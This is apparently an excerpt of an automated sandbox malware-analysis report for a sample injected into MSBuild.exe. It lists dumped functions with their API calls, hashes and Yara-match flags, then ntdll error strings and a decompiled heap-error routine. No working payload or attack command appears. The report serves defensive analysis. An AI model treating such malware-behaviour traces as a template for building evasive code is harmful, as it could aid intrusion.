                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 155 10e95d0-10e95dc LdrInitializeThunk
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 9721ab432709719a81451d3757a84ca1c9c56b09708ca3a12061a9ce144750ff
                                                                                                • Instruction ID: e762391e2b01368930a286aa1b51783dd33a26e74d0a8ab0661c00b639fbe943
                                                                                                • Opcode Fuzzy Hash: 9721ab432709719a81451d3757a84ca1c9c56b09708ca3a12061a9ce144750ff
                                                                                                • Instruction Fuzzy Hash: E09002A120200503410571998415716410AA7E0241B52C025E24045D0DC565889172A5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010E9710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 4c0a246efba73e826125c925e31b260ff32d00c85cb8bb5cf904f336e2a46828
                                                                                                • Instruction ID: 60db6efef3128cec25700c22a416fa7ad7229706e21eebe61ddf46cfc4ab45e5
                                                                                                • Opcode Fuzzy Hash: 4c0a246efba73e826125c925e31b260ff32d00c85cb8bb5cf904f336e2a46828
                                                                                                • Instruction Fuzzy Hash: 3090027120100902D10065D994097460105A7E0341F52D015A6414595EC6A5889172B1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010E9780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 2ac1bfe1663029a29877fd7f664b932f8009b2fe12d2d58864457bf16fba9ff2
                                                                                                • Instruction ID: 2fda15ce55c615e4cf1a8d2b4c83ed8e40b0ac3bb2425b87b015ef29bad98e4d
                                                                                                • Opcode Fuzzy Hash: 2ac1bfe1663029a29877fd7f664b932f8009b2fe12d2d58864457bf16fba9ff2
                                                                                                • Instruction Fuzzy Hash: C090026921300502D1807199940970A0105A7D1242F92D419A1405598CC955886973A1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010E97A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 402191e0d7358cbffafae839eb2088a355e5f970e5b8d69c7d992ebd1164602a
                                                                                                • Instruction ID: df9e500c5cbd68c8f0aa897e9cadc8c2a3599038c3fa7e16064ae6c375d1f30b
                                                                                                • Opcode Fuzzy Hash: 402191e0d7358cbffafae839eb2088a355e5f970e5b8d69c7d992ebd1164602a
                                                                                                • Instruction Fuzzy Hash: DF90026130100503D140719994197064105F7E1341F52D015E1804594CD955885673A2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010E9FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: e649323e3f151a4ab73f60067bb8517dc566b365de8c775c4f0a1bf890a42f25
                                                                                                • Instruction ID: c9f34f66f8374048e44d03b6e104c387d5419e39826127115ae229d433dd38b7
                                                                                                • Opcode Fuzzy Hash: e649323e3f151a4ab73f60067bb8517dc566b365de8c775c4f0a1bf890a42f25
                                                                                                • Instruction Fuzzy Hash: 3490027131114902D1106199C4057060105A7D1241F52C415A1C14598DC6D5889172A2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010E9660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: eb846f4847049124fbb2d82d0f2b97b66299a387517b82d7ff305ac163bfe18d
                                                                                                • Instruction ID: c475082a9aae24c3fe23df52ccb33e4f9fdb18bdf8bedd88ff78e801f66f022c
                                                                                                • Opcode Fuzzy Hash: eb846f4847049124fbb2d82d0f2b97b66299a387517b82d7ff305ac163bfe18d
                                                                                                • Instruction Fuzzy Hash: 4E90027120100D02D1807199840574A0105A7D1341F92C019A1415694DCA558A5977E1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010E96E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 14fcd29c9584aaff12b72de961dd418b8c554fcd99ebd8c01e0cf65077858417
                                                                                                • Instruction ID: 5a3075d5e3f328f55a11af32032a2017f7e6d014979893b2e6fabc260b327d1d
                                                                                                • Opcode Fuzzy Hash: 14fcd29c9584aaff12b72de961dd418b8c554fcd99ebd8c01e0cf65077858417
                                                                                                • Instruction Fuzzy Hash: 2590027120108D02D1106199C40574A0105A7D0341F56C415A5814698DC6D5889172A1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 004098F3 Relevance: 1.6, APIs: 1, Instructions: 62threadwindowCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • PostThreadMessageW.USER32(0000CF4E,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409956
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.485479676.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_401000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MessagePostThread
                                                                                                • String ID:
                                                                                                • API String ID: 1836367815-0
                                                                                                • Opcode ID: 9de79bde484d93d853f03bbf4d399184f238acb755490e6ef710bb495c24de64
                                                                                                • Instruction ID: de4060f9fa8739516995b8b432bc264f027ef436cb1a247df1a32266bba5a157
                                                                                                • Opcode Fuzzy Hash: 9de79bde484d93d853f03bbf4d399184f238acb755490e6ef710bb495c24de64
                                                                                                • Instruction Fuzzy Hash: 1201DB71A4021476E720A6959C42FFF775C9B40B45F04012DFF047A2C2D6E86A0547E9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0040CF43 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 106 40cf43-40cf6c call 420e93 109 40cf72-40cf80 call 4213b3 106->109 110 40cf6e-40cf71 106->110 113 40cf90-40cfa1 call 41f743 109->113 114 40cf82-40cf8d call 421633 109->114 119 40cfa3-40cfb7 LdrLoadDll 113->119 120 40cfba-40cfbd 113->120 114->113 119->120
                                                                                                APIs
                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040CFB5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.485479676.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_401000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Load
                                                                                                • String ID:
                                                                                                • API String ID: 2234796835-0
                                                                                                • Opcode ID: 68fe24ff8bce41d18426065ea2a0f6e50d3c61ef71737ede9921b03aa4814a43
                                                                                                • Instruction ID: 6faf74a3aae3453d344e3954af1907341ae2654d09d986177d5db1946866d7ad
                                                                                                • Opcode Fuzzy Hash: 68fe24ff8bce41d18426065ea2a0f6e50d3c61ef71737ede9921b03aa4814a43
                                                                                                • Instruction Fuzzy Hash: 810175B1E0010EABDF10DBE1DC82FDEB3789B54308F0042A6F908A7280F634EB448B95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0041E843 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 138 41e843-41e874 call 41f1a3 RtlFreeHeap
                                                                                                APIs
                                                                                                • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,74511176,00000000,?), ref: 0041E870
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.485479676.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_401000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FreeHeap
                                                                                                • String ID:
                                                                                                • API String ID: 3298025750-0
                                                                                                • Opcode ID: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                                                • Instruction ID: 061864bc1c04e48f0c44da88f6a003fae0e819f7d47d41956cf74d04cd78825c
                                                                                                • Opcode Fuzzy Hash: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                                                • Instruction Fuzzy Hash: DFE012B1200208ABDB14EF89DC49EA737ACAF88754F018159BA095B282C670E914CAB1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0041E803 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 135 41e803-41e834 call 41f1a3 RtlAllocateHeap
                                                                                                APIs
                                                                                                • RtlAllocateHeap.NTDLL(00418C69,?,00419410,00419410,?,00418C69,00000000,?,?,?,?,00000000,00000000,00000002), ref: 0041E830
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.485479676.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_401000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1279760036-0
                                                                                                • Opcode ID: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
                                                                                                • Instruction ID: f2058bd6bc749991d4368c8bf30a122c18bef3a6f25dbbe48d49dd61b76beb85
                                                                                                • Opcode Fuzzy Hash: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
                                                                                                • Instruction Fuzzy Hash: 2EE012B2210208ABDB14EF89DC45EA737ACAF88664F018159BA085B242C670F9148AB1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 004100C3 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 130 4100c3-4100e7 call 4195b3 133 4100e9-4100ea 130->133 134 4100eb-4100fc GetUserGeoID 130->134
                                                                                                APIs
                                                                                                • GetUserGeoID.KERNELBASE(00000010), ref: 004100ED
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.485479676.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_401000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: User
                                                                                                • String ID:
                                                                                                • API String ID: 765557111-0
                                                                                                • Opcode ID: cd48cdcd120f763e343e92812f1fb625a3c8b0b6998f85fea71fc4464a0d279f
                                                                                                • Instruction ID: d3a3e2032565f6d34a55456b5a80270182852c25dcf9d34bac0e0dafc7ea0ddc
                                                                                                • Opcode Fuzzy Hash: cd48cdcd120f763e343e92812f1fb625a3c8b0b6998f85fea71fc4464a0d279f
                                                                                                • Instruction Fuzzy Hash: 62E0C27378030467FA2091A59C42FBA364F5B84B00F048475F90CE62C2D5A8E8C00028
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0041E9A3 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 141 41e9a3-41e9d7 call 41f1a3 LookupPrivilegeValueW
                                                                                                APIs
                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040FF15,0040FF15,?,00000000,?,?), ref: 0041E9D3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.485479676.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_401000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LookupPrivilegeValue
                                                                                                • String ID:
                                                                                                • API String ID: 3899507212-0
                                                                                                • Opcode ID: 4e26b51885fde93309f56aebe0523e6fe8fd084813fce991475a3464cf4cca46
                                                                                                • Instruction ID: 02fe57901e8a5b4e00b32200d8c0e4b90d1eaf32df05805676fd4b31292b2f7e
                                                                                                • Opcode Fuzzy Hash: 4e26b51885fde93309f56aebe0523e6fe8fd084813fce991475a3464cf4cca46
                                                                                                • Instruction Fuzzy Hash: 74E01AB1600204ABD710DF49CC45FE737ADAF88654F014165BA0C57242C675E8148AB5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0041E883 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 147 41e883-41e8af call 41f1a3 ExitProcess
                                                                                                APIs
                                                                                                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E8AB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.485479676.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_401000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExitProcess
                                                                                                • String ID:
                                                                                                • API String ID: 621844428-0
                                                                                                • Opcode ID: b051f3f07c07ae75c1bb8a4eda91bbaf91bf26c306f7dd14cd116b558089ae68
                                                                                                • Instruction ID: bb13c278b44b5bdd0e2ad78b5b8e3d3090acd9400a4d550697792ae986e9d2f8
                                                                                                • Opcode Fuzzy Hash: b051f3f07c07ae75c1bb8a4eda91bbaf91bf26c306f7dd14cd116b558089ae68
                                                                                                • Instruction Fuzzy Hash: 90D01772600214BBDA20EB99CC85FD777ACDF856A4F0180A5BA4C5B282CA75BA40C7E1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010E967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 150 10e967a-10e967f 151 10e968f-10e9696 LdrInitializeThunk 150->151 152 10e9681-10e9688 150->152
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: b6f9fde532db9f1ce7a3beb367ab4be77d3e1837983831709602a988df01f038
                                                                                                • Instruction ID: 0a4d5c336d12697b3381f487c9a6c574dbc6d79d57d7dedfb454c95a9eb9808e
                                                                                                • Opcode Fuzzy Hash: b6f9fde532db9f1ce7a3beb367ab4be77d3e1837983831709602a988df01f038
                                                                                                • Instruction Fuzzy Hash: C5B09B719014C5C9D655D7A5860C7177A4077D4745F17C056D2420681B4778C0D1F6F5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Non-executed Functions

                                                                                                Function 0115B260 Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • The critical section is owned by thread %p., xrefs: 0115B3B9
                                                                                                • Go determine why that thread has not released the critical section., xrefs: 0115B3C5
                                                                                                • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0115B47D
                                                                                                • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0115B2DC
                                                                                                • read from, xrefs: 0115B4AD, 0115B4B2
                                                                                                • <unknown>, xrefs: 0115B27E, 0115B2D1, 0115B350, 0115B399, 0115B417, 0115B48E
                                                                                                • This failed because of error %Ix., xrefs: 0115B446
                                                                                                • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0115B476
                                                                                                • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0115B484
                                                                                                • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0115B314
                                                                                                • a NULL pointer, xrefs: 0115B4E0
                                                                                                • *** Resource timeout (%p) in %ws:%s, xrefs: 0115B352
                                                                                                • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0115B53F
                                                                                                • The instruction at %p referenced memory at %p., xrefs: 0115B432
                                                                                                • *** An Access Violation occurred in %ws:%s, xrefs: 0115B48F
                                                                                                • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0115B305
                                                                                                • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0115B323
                                                                                                • The resource is owned exclusively by thread %p, xrefs: 0115B374
                                                                                                • *** enter .exr %p for the exception record, xrefs: 0115B4F1
                                                                                                • *** then kb to get the faulting stack, xrefs: 0115B51C
                                                                                                • write to, xrefs: 0115B4A6
                                                                                                • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0115B2F3
                                                                                                • The instruction at %p tried to %s , xrefs: 0115B4B6
                                                                                                • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0115B39B
                                                                                                • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0115B3D6
                                                                                                • *** Inpage error in %ws:%s, xrefs: 0115B418
                                                                                                • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0115B38F
                                                                                                • *** enter .cxr %p for the context, xrefs: 0115B50D
                                                                                                • The resource is owned shared by %d threads, xrefs: 0115B37E
                                                                                                • an invalid address, %p, xrefs: 0115B4CF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                                • API String ID: 0-108210295
                                                                                                • Opcode ID: 3c7b6d0d7e86a63e38afac5163455290efcd0a6e00d249810478df015251c936
                                                                                                • Instruction ID: e48d18eeea44d3ffa5df6f6579e61cb13f40ad12588d55c94c24a7d2b489b144
                                                                                                • Opcode Fuzzy Hash: 3c7b6d0d7e86a63e38afac5163455290efcd0a6e00d249810478df015251c936
                                                                                                • Instruction Fuzzy Hash: 58812771A48200FFDF6E6A4ACC56D7B3F27AF96A95F410048F9152F116D3618401E776
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01161C06 Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 44%
                                                                                                			E01161C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x10848a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E010AB150();
				} else {
					E010AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x119589c);
				E010AB150("Heap error detected at %p (heap handle %p)\n",  *0x11958a0);
				_t27 =  *0x1195898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01161E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E010AB150();
				} else {
					E010AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E010AB150("Error code: %d - %s\n",  *0x1195898);
				_t113 =  *0x11958a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E010AB150();
					} else {
						E010AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E010AB150("Parameter1: %p\n",  *0x11958a4);
				}
				_t115 =  *0x11958a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E010AB150();
					} else {
						E010AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E010AB150("Parameter2: %p\n",  *0x11958a8);
				}
				_t117 =  *0x11958ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E010AB150();
					} else {
						E010AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E010AB150("Parameter3: %p\n",  *0x11958ac);
				}
				_t119 =  *0x11958b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E010AB150();
					} else {
						E010AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x11958b4);
					E010AB150("Last known valid blocks: before - %p, after - %p\n",  *0x11958b0);
				} else {
					_t120 =  *0x11958b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E010AB150();
				} else {
					E010AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E010AB150("Stack trace available at %p\n", 0x11958c0);
			}











                                                                                                0x01161c10
                                                                                                0x01161c16
                                                                                                0x01161c1e
                                                                                                0x01161c3d
                                                                                                0x01161c3e
                                                                                                0x01161c20
                                                                                                0x01161c35
                                                                                                0x01161c3a
                                                                                                0x01161c44
                                                                                                0x01161c55
